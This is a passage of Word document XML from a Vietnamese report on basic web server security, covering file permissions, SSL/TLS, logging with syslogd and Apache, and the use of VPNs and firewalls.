    <w:p w14:paraId="14E9B174" w14:textId="77777777" w:rsidR="00332530" w:rsidRDefault="003C27D3" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tính sẵn sàng (Availability):</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đảm bảo khả năng truy cập thông tin, tính năng của hệ thống thông tin mỗi khi người dùng hợp lệ có nhu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9F41A" w14:textId="5181E913" w:rsidR="003C27D3" w:rsidRPr="001D7AFB" w:rsidRDefault="001D7AFB" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tính toàn vẹn (Intergrity):</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đảm bảo thông tin không bị thay đổi trái phép hoặc thay đổi không như ý muốn</w:t>
      </w:r>
      <w:r w:rsidR="002B7B81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20206DD3" w14:textId="23A9142B" w:rsidR="001D7AFB" w:rsidRDefault="001D7AFB" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="20" w:name="_Toc171085484"/>
      <w:r w:rsidR="00B0690F">
        <w:t>Các biện pháp bảo mật cơ b</w:t>
      </w:r>
      <w:r w:rsidR="00015185">
        <w:t>ản</w:t>
      </w:r>
      <w:r w:rsidR="00360F80">
        <w:t xml:space="preserve"> của Web S</w:t>
      </w:r>
      <w:r w:rsidR="000F10FF">
        <w:t>erver</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="28776D7E" w14:textId="206F4932" w:rsidR="00EB0241" w:rsidRDefault="009547CB" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tập </w:t>
      </w:r>
      <w:r w:rsidR="005A3C00">
        <w:t xml:space="preserve">trung </w:t>
      </w:r>
      <w:r w:rsidR="00933497">
        <w:t>vào việc triển khai các biện pháp bảo mật cơ bản nhưng thiết yếu để đảm bảo hệ thống của bạn được bảo vệ một cách hiệu quả</w:t>
      </w:r>
      <w:r w:rsidR="00470431">
        <w:t>. Đây là những bước đầu tiên mà mọi quản trị viên hệ thống cần thực hiện để đối phó với các mối đe dọa phổ biến và khẩn cấp, tạo nền tảng vững chắc cho một hệ thống bảo mật hiệu quả</w:t>
      </w:r>
      <w:r w:rsidR="00AD4BDB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13719A0B" w14:textId="11053FAF" w:rsidR="00317143" w:rsidRDefault="008601B5" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc171085485"/>
      <w:r>
        <w:t>Quyền đối với file (</w:t>
      </w:r>
      <w:r w:rsidR="00193CA8">
        <w:t>File permission</w:t>
      </w:r>
      <w:r w:rsidR="00317143">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00193CA8">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="42D61791" w14:textId="3339338F" w:rsidR="00BE4E04" w:rsidRDefault="00BE4E04" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mỗi thư mục hoặc tệp tin trong Web Server đều có các quyền riêng. Các quyền này xác định </w:t>
      </w:r>
      <w:r w:rsidR="00D26C25">
        <w:t xml:space="preserve">người dùng nào được phép làm gì với các tập tin. </w:t>
      </w:r>
      <w:r w:rsidR="00657F47">
        <w:t>Trên các hệ điều hành dựa trên Unix, có ba loại quyền: đọc, ghi và thực thi, và ba loại chủ sở hữu: chủ sở hữu, nhóm và người khác. Quyền được thiết lập bằng cách sử dụng một số ba chữ số: ví dụ, 000 là mức hạn chế nhất tước đi tất cả các quyền trên tệp tin, và 777 là mức tự do nhất cung cấp tất cả các quyền cho tất cả người dùng</w:t>
      </w:r>
      <w:r w:rsidR="00EB1507">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003804C6">
        <w:t xml:space="preserve"> Chữ số đầu tiên đại diện cho quyền của chủ sở hữu tệp, chữ số thứ hai đại diện cho những gì người dùng được ủy quyền khác có thể làm và chữ số thứ ba là quyền của tất cả những người khác. Lệnh sử dụng để thay đổi hoặc thiết lập quyền của một tệp tin là </w:t>
      </w:r>
      <w:r w:rsidR="003804C6">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r w:rsidR="003804C6">
        <w:t xml:space="preserve">. Để duy trì sự cân bằng giữa khả năng sử dụng và bảo mật, tất cả các thư mục nên được đặt thành </w:t>
      </w:r>
      <w:r w:rsidR="003804C6">
        <w:lastRenderedPageBreak/>
        <w:t>755 và tất cả các tệp tin nên được đặt thành 644 trừ khi một tệp tin</w:t>
      </w:r>
      <w:r w:rsidR="005D39CA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00010503">
        <w:t xml:space="preserve"> thư mục</w:t>
      </w:r>
      <w:r w:rsidR="003804C6">
        <w:t xml:space="preserve"> cụ thể có cấu hình đòi hỏi khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EE87D" w14:textId="56D80EF1" w:rsidR="00A966E9" w:rsidRDefault="000B6D33" w:rsidP="000B6D33">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000B6D33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39C2176E" wp14:editId="6609B5AB">
            <wp:extent cx="2217612" cy="541067"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110389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90284" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2217612" cy="541067"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB99BA" w14:textId="39CABAA7" w:rsidR="000B6D33" w:rsidRDefault="00F86144" w:rsidP="00F86144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc170814816"/>
      <w:r>
        <w:t xml:space="preserve">Hình 2. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_2. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C43301">
        <w:t>Câu lệnh thay đổi quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6A422B4B" w14:textId="2DD1FEF4" w:rsidR="00F251A8" w:rsidRDefault="00335378" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Quyền đối với tệp là một cách phổ biến và tốt để giữ cho các tệp và thư mục được bảo vệ không bị truy cập trái phép. Một điều được khuyến cáo khi cấu hình là tránh tạo các tệp có quyền ghi trong thư mục gốc</w:t>
      </w:r>
      <w:r w:rsidR="005143DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A739CF">
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="005143DF">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006321BA">
        <w:t>Một tỷ lệ lớn các cuộc tấn công vào các trang web nhỏ là do máy chủ web có thể ghi vào thư mục gốc</w:t>
      </w:r>
      <w:r>
        <w:t>, nên kẻ tấn công tải lên một script và gọi nó qua trình duyệt của mình</w:t>
      </w:r>
      <w:r w:rsidR="00917B75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E41E8C" w14:textId="181B77CC" w:rsidR="00BC23F3" w:rsidRDefault="00BC23F3" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc171085486"/>
      <w:r>
        <w:t>Bảo vệ máy chủ bằng SSL</w:t>
      </w:r>
      <w:r w:rsidR="00F227BD">
        <w:t xml:space="preserve"> (TLS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6F0B91C7" w14:textId="7F31CC66" w:rsidR="00355957" w:rsidRDefault="00355957" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="0063762A">
        <w:t>Tất cả dữ liệu trên Web Server để đảm bảo an toàn đều được xử lý thông qua SSL (TLS), một công nghệ được sử dụng để mã hóa dữ liệu qua kênh truyền nhằm tránh bị nghe lén, giả mạo. SSL (TLS) bảo vệ các giao thức như HTTP, FTP, SMTP, và nhiều giao thức khác</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD12C86" w14:textId="77777777" w:rsidR="0063762A" w:rsidRDefault="0063762A" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Ngày nay, các thư viện cần thiết cho giao thức SSL (TLS) đều được thống nhất dưới dự án OpenSSL, một dự án mã nguồn mở. Các thư viện này thực hiện các chức năng mã hóa cơ bản và cung cấp các chức năng tiện ích khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B68C8" w14:textId="35B5B700" w:rsidR="00592847" w:rsidRDefault="00EC252F" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Cách thức hoạt động: máy khách và máy chủ sẽ liên hệ đàm phán kết nối bằng cách sử dụng quy trình bắt tay TLS. Trong quá trình bắt tay này, máy khách và máy chủ thỏa thuận về việc sử dụng các tham số nhất định để thiết lập tính bảo mật và kết nối. Quy trình bao gồm các bước như ClientHello, ServerHello, trao đổi chứng chỉ và tạo khóa phiên</w:t>
      </w:r>
      <w:r w:rsidR="00592847">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF3CA1" w14:textId="49CA3AAA" w:rsidR="000E5C77" w:rsidRDefault="000327EC" w:rsidP="00F77514">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000327EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E39624C" wp14:editId="6C068787">
            <wp:extent cx="3738400" cy="2521283"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174067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9378" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757757" cy="2534338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EDAB7" w14:textId="0647C084" w:rsidR="00F77514" w:rsidRDefault="00F86144" w:rsidP="00F86144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc170814817"/>
      <w:r>
        <w:t xml:space="preserve">Hình 2. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_2. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0010032D">
        <w:t>Quy trình bắt tay SSL (TLS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="572B800A" w14:textId="4227B03A" w:rsidR="009607E8" w:rsidRDefault="00A06E60" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Trong những trường hợp có biện pháp bảo mật nghiêm ngặt, máy khách sẽ liên hệ với đơn vị cấp phép để xác minh tính hợp lệ của máy chủ trước khi thiết lập một kết nối</w:t>
      </w:r>
      <w:r w:rsidR="00FA763D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96B5CB" w14:textId="77777777" w:rsidR="00C47403" w:rsidRDefault="00CF4D12" w:rsidP="00AD4BDB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Lợi ích của SSL (TLS) bao gồm việc đơn giản hóa xác minh bằng cách sử dụng chính trình duyệt web làm phần mềm máy khách, loại bỏ nhu cầu về các ứng dụng phần mềm bổ sung. Các thuật toán mã hóa đã tiến bộ cùng với công nghệ để cung cấp mức độ bảo mật cao với tính khả dụng của các khóa 256 bit trở lên</w:t>
      </w:r>
      <w:r w:rsidR="003A7A14">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3500E0" w14:textId="7B79AAE7" w:rsidR="00474F4C" w:rsidRDefault="0028493B" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc171085487"/>
      <w:r>
        <w:t>Ghi nhật kí thông tin</w:t>
      </w:r>
      <w:r w:rsidR="00EA6C5D">
        <w:t xml:space="preserve"> trên Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="2E66452F" w14:textId="6E3E631E" w:rsidR="00EB0241" w:rsidRDefault="00011E41" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu server</w:t>
      </w:r>
      <w:r w:rsidR="000715EC">
        <w:t xml:space="preserve"> xảy ra </w:t>
      </w:r>
      <w:r w:rsidR="00B47251">
        <w:t>lỗi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> không thể khôi phục, nhật kí sẽ cho phép kiểm tra lịch sử </w:t>
      </w:r>
      <w:r w:rsidR="00765FF7">
        <w:t xml:space="preserve">trước khi sự cố xảy ra. Nếu sự cố liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00FB3736">
        <w:t xml:space="preserve">xâm nhập, bất kì thông tin nào có thể mô tả cách </w:t>
      </w:r>
      <w:r w:rsidR="00FC5F1C">
        <w:t>Web Server</w:t>
      </w:r>
      <w:r w:rsidR="00FB3736">
        <w:t xml:space="preserve"> bị xâm nhập</w:t>
      </w:r>
      <w:r w:rsidR="00267085">
        <w:t xml:space="preserve"> giúp xác định nguyên nhân của vấn đề. Vì tầm quan trọng của các tệp nhật kí </w:t>
      </w:r>
      <w:r w:rsidR="00547B26">
        <w:t xml:space="preserve">đối với quản trị viên, vị trí của các tệp này không nên đặt </w:t>
      </w:r>
      <w:r w:rsidR="00FC5F1C">
        <w:t>tại Web Server</w:t>
      </w:r>
      <w:r w:rsidR="00007C0B">
        <w:t xml:space="preserve">. Một phương pháp phổ biến là sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="008F5576">
        <w:t xml:space="preserve">máy chủ ghi </w:t>
      </w:r>
      <w:r w:rsidR="00086FDD">
        <w:t>nhật kí từ xa với bảo mật chặt chẽ</w:t>
      </w:r>
      <w:r w:rsidR="009F67CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54251B4B" w14:textId="6B49BC4B" w:rsidR="009F67CB" w:rsidRDefault="009F67CB" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Một trong những công cụ ghi nhật kí chính trên mọi phân phối </w:t>
      </w:r>
      <w:r w:rsidR="002F066D">
        <w:t>Linux là syslogd</w:t>
      </w:r>
      <w:r w:rsidR="00201767">
        <w:t xml:space="preserve">. Các phần mềm </w:t>
      </w:r>
      <w:r w:rsidR="004075A0">
        <w:t>khác nhau lưu nhật kí ở các vị trí khác nhau, ví dụ với Apache</w:t>
      </w:r>
      <w:r w:rsidR="00A52889">
        <w:t>, người quản trị có thể thiết lập lưu trữ nhật kí thông qua http.conf</w:t>
      </w:r>
      <w:r w:rsidR="005E0F8F">
        <w:t xml:space="preserve"> và nếu sử dụng Red Hat, tệp httpd.conf thường được lưu trữ tại </w:t>
      </w:r>
      <w:r w:rsidR="00442B2A">
        <w:t>/etc/httpd/conf/httpd.conf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AF4BF3" w14:textId="56155B30" w:rsidR="003000C5" w:rsidRDefault="003000C5" w:rsidP="003000C5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D003BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C58279E" wp14:editId="791761FC">
            <wp:extent cx="5212080" cy="1981201"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="20367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8429" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5242676" cy="1992831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A2BCE" w14:textId="72A41EC2" w:rsidR="00D003BA" w:rsidRPr="003000C5" w:rsidRDefault="00F86144" w:rsidP="00F86144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc170814818"/>
      <w:r>
        <w:t xml:space="preserve">Hình 2. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_2. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F03094">
        <w:t>Log trên Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="79F611C3" w14:textId="0442DE60" w:rsidR="00442B2A" w:rsidRDefault="00442B2A" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hiện nay có vô số công cụ và ứng dụng </w:t>
      </w:r>
      <w:r w:rsidR="008C4F37">
        <w:t xml:space="preserve">cho phép ghi nhật kí </w:t>
      </w:r>
      <w:r w:rsidR="003A761A">
        <w:t xml:space="preserve">chi tiết </w:t>
      </w:r>
      <w:r w:rsidR="00AE41EB">
        <w:t xml:space="preserve">do người dùng xác định về tất cả hành động </w:t>
      </w:r>
      <w:r w:rsidR="00ED2F4A">
        <w:t>và dữ liệu được coi là quan trọng</w:t>
      </w:r>
      <w:r w:rsidR="00905E02">
        <w:t xml:space="preserve"> đối với </w:t>
      </w:r>
      <w:r w:rsidR="00590841">
        <w:t>Web Server</w:t>
      </w:r>
      <w:r w:rsidR="00C56880">
        <w:t xml:space="preserve">. Một </w:t>
      </w:r>
      <w:r w:rsidR="00D52B12">
        <w:t>Web Server được đánh giá</w:t>
      </w:r>
      <w:r w:rsidR="00C56880">
        <w:t xml:space="preserve"> tốt là </w:t>
      </w:r>
      <w:r w:rsidR="00EA6C5D">
        <w:t>có khả năng</w:t>
      </w:r>
      <w:r w:rsidR="00C56880">
        <w:t xml:space="preserve"> theo dõi tất cả các hành động được thực hiện để có thể khôi phục trong trường hợp</w:t>
      </w:r>
      <w:r w:rsidR="00ED482C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA6C5D">
        <w:t>Web Server</w:t>
      </w:r>
      <w:r w:rsidR="00C56880">
        <w:t xml:space="preserve"> xảy ra </w:t>
      </w:r>
      <w:r w:rsidR="00B352F7">
        <w:t>vẫn đề.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A8317" w14:textId="2D682C0A" w:rsidR="00C006DD" w:rsidRDefault="00205D3F" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc171085488"/>
      <w:r>
        <w:t>Sử dụng VPN để tăng cường bảo mật</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4CC1CB90" w14:textId="1B7953ED" w:rsidR="00EA6C5D" w:rsidRDefault="009D1A24" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mạng riêng ảo (VPN) </w:t>
      </w:r>
      <w:r w:rsidR="002B2D45">
        <w:t xml:space="preserve">trong môi trường </w:t>
      </w:r>
      <w:r w:rsidR="00146204">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="002B2D45">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00146204">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002B2D45">
        <w:t>erver là một phương pháp bảo mật sử dụng mạng công cộng (thường là Internet) để kết nối các thiết bị từ xa với web server của một tổ chức. Thay vì sử dụng các kết nối trực tiếp như đường truyền thuê riêng, VPN tạo ra các kết nối "ảo" được mã hóa, đảm bảo dữ liệu được truyền đi an toàn và bảo mật</w:t>
      </w:r>
      <w:r w:rsidR="00A62AD3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D5221E">
        <w:t xml:space="preserve"> VPN</w:t>
      </w:r>
      <w:r w:rsidR="00B26006">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A7A02">
        <w:t xml:space="preserve">được thiết kế có thể </w:t>
      </w:r>
      <w:r w:rsidR="00B26006">
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00146204">
        <w:t xml:space="preserve"> một số phương pháp </w:t>
      </w:r>
      <w:r w:rsidR="00D475B0">
        <w:t xml:space="preserve">để giữ </w:t>
      </w:r>
      <w:r w:rsidR="00146204">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidR="00D475B0">
        <w:t xml:space="preserve"> cho kết nối và dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB6383" w14:textId="4FF328F2" w:rsidR="00D475B0" w:rsidRDefault="000D75C6" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tường lửa</w:t>
      </w:r>
      <w:r w:rsidR="004A7C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00286215">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00524083">
        <w:t>cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="00D83ADD">
        <w:t xml:space="preserve"> một hàng rào bảo vệ giữa mạng riêng và Internet. </w:t>
      </w:r>
      <w:r w:rsidR="00FA57CC">
        <w:t>Sử dụng tường lửa có thể hạn chế số lượng cổng mở, loại gói nào đi qua và giao thức nào được phép đi qua.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11493B10" w14:textId="62633A05" w:rsidR="006F5528" w:rsidRDefault="006F5528" w:rsidP="006F5528">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C866CCC" wp14:editId="0DD809CC">
            <wp:extent cx="3451860" cy="2205079"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1481622947" name="Picture 1" descr="openvpn - Access web server on VPN client through VPN server public IP -  Server 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pn - Access web server on VPN client through VPN server public IP -  Server Fau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1520" cy="2217638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2ECBC" w14:textId="6F2FC97F" w:rsidR="006F5528" w:rsidRDefault="00F86144" w:rsidP="00F86144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc170814819"/>
      <w:r>
        <w:t xml:space="preserve">Hình 2. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_2. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
